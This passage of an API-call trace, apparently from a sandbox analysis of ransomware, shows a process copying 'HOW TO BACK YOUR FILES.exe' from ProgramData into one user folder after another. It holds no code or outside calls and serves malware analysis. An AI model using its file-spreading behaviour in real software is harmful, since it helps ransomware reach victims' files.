dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0078.579] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned 82 [0078.579] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low" [0078.579] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.579] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.579] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.579] GetLastError () returned 0x0 [0078.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.579] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.580] CloseHandle (hObject=0x118) returned 1 [0078.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.580] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.580] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" [0078.580] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" [0078.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.581] GetLastError () returned 0x0 [0078.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.581] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.581] CloseHandle (hObject=0x118) returned 1 [0078.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.581] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.582] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.582] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.582] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.582] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.582] GetLastError () returned 0x0 [0078.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.583] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.583] CloseHandle (hObject=0x118) returned 1 [0078.583] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.583] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.583] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.583] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.583] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.583] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.583] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.583] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.584] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.584] GetLastError () returned 0x0 [0078.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.584] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.584] CloseHandle (hObject=0x118) returned 1 [0078.584] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.584] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.585] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.585] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.585] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.586] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.586] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.587] GetLastError () returned 0x0 [0078.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.587] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.587] CloseHandle (hObject=0x118) returned 1 [0078.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.587] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.588] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.588] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.588] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.588] GetLastError () returned 0x0 [0078.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.588] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.589] CloseHandle (hObject=0x118) returned 1 [0078.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.589] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.589] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.589] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.589] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft" [0078.589] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft" [0078.589] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.589] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.590] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.590] GetLastError () returned 0x0 [0078.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.590] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.590] CloseHandle (hObject=0x118) returned 1 [0078.590] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.590] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.591] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" [0078.591] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" [0078.591] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.591] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.591] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.592] GetLastError () returned 0x0 [0078.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.592] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.592] CloseHandle (hObject=0x118) returned 1 [0078.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.592] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.592] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.592] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.592] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0078.592] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0078.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.593] GetLastError () returned 0x0 [0078.593] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.593] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.593] CloseHandle (hObject=0x118) returned 1 [0078.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.593] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.594] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media" [0078.594] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media" [0078.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.594] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and 